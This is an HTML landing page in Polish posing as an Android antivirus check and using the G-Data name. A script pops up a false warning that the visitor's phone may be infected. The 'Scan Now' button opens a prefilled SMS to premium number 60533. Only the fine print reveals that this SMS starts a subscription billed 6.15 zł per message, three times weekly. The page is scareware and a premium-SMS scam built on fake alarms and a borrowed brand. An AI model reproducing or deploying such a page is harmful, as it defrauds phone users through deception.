<!doctype html>
<html>
    <head>
        <title>Antivirus</title>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
        <link rel="stylesheet" href="css/style.css" type="text/css">
    </head>
    <body>
        <div class="container">
            <div class="row">
                <div class="header">
                    <img src="images/header.png" />
                </div>		
            </div>
            <div class="row">
                <img id="banner" src="images/banner.jpg"/>
            </div>
            <div class="row">
                <div class="maintText">
                    <div class="title">
                        Chron swój telefon przed wirusami i malware 
                    </div>
                    <div class="subTitle">
                        Chcesz sprawdzic teraz czy Twój telefon Android jest zagrozony? <br>
                        Postepuj zgodnie z instrukcjami by sciagnac aplikacje G-Data: <br>
                        <span style="color: #2e2e2e;">
                            <b>
                                Krok 1: Kliknij "Skanuj Teraz" <br>
                                Krok 2: Kliknij "Wyslij" <br>
                            </b>
                        </span>
                        <a class="btnSms" id="smsBtn" href="sms:60533?body=TAK 123">Skanuj Teraz</a>
                        <br>
                    </div>
                </div>
            </div>
        </div>
        <div class="disclimer">
            <div class="footer">
                Usługa jest oparta o mechanizm subskrypcji, polegający na cyklicznym wysyłaniu przez usługodawcę wiadomości sms do użytkownika usługi. Usługa jest dostępna dla wlaścicieli telefonów komórkowych Android posiadających aktywną kartę SIM w jedenym z operatorów: P4 Sp. z o.o. (Play), PTK Centertel Sp. z o.o. (Orange), PTC S.A. (T-mobile) oraz Polkomtel Sp. z o.o. (Plus). Aby zamówic usługę należy postępować zgodnie z poleceniami pojawiającymi sie na kolejnych podstronach internetowych serwisu uslugi. Zamówienie uslugi nastepuje z chwila wysłania komendy TAK na numer 60533 . Przed zamówieniem usługi nalezy zapoznać sie z regulaminem usługi. Zamawiając usługę Użytkownik potwierdza zapoznanie się z treścią regulaminu usługi oraz wyraża zgodę na jego treść. Za pośrednictwem Usługi Dostawca zapewnia użytkownikom dostęp do aplikacji mobilnych oraz w trybie online, w tym aplikacji antywirusowej. Użytkownik usługi jest obciążany kosztem wyslania przez usługodawcę każdej wiadomości sms. Koszt wysłania jednej wiadomości sms wynosi 5,- (pięć zlołych netto) /6,15 (sześć złotych i piętnaście groszy) brutto i jest dopisywany do rachunku telefonicznego Użytkownika. Użytkownik otrzymuje 3 (trzy) wiadomosci sms tygodniowo (w poniedziałek, środę i piątek o godzinie 18:00). Użytkownik może w kazdej chwili zrezygnować z usługi wysyłając wiadomość SMS o treści „STOP TAK” na numer 60533 (wysłanie wiadomości jest dla użytkownika bezpłatne). Wszelkie inne koszty połączen telekomunikacyjnych (np. opłaty za transfer) są zgodne ze taryfą operatora Użytkownika. Usługodawcą jest LS Solutions, St Catharinagilde 3, 8253 KA Dronten, Holandia. Użytkownik moze złożyć reklamację za pośrednictwem formularza kontaktowego, e-mailem (support@gamobila.com) lub telefonicznie (XXXXXXXXX). 
            </div>
        </div>
        <script type="text/javascript">
            var city = 'Bangladesh';
            if (city == '' || typeof (city) == "undefined") {
                alert('Uwaga, Uzytkowniku z Polski!\n\nCzy pobierales kiedykolwiek darmowe gry lub aplikacje na urzadzenie z systemem Android? Wiekszosc mobilnych wirusów roznosi sie przez darmowe gry i aplikacje.\n\nKliknij "OK", aby sprawdzic, czy Twój telefon zostal zainfekowany.');
            } else {
                alert('Uwaga, Uzytkowniku z ' + city + '!\n\nCzy pobierales kiedykolwiek darmowe gry lub aplikacje na urzadzenie z systemem Android? Wiekszosc mobilnych wirusów roznosi sie przez darmowe gry i aplikacje.\n\nKliknij "OK", aby sprawdzic, czy Twój telefon zostal zainfekowany.');
            }
        </script>
    </body>
</html>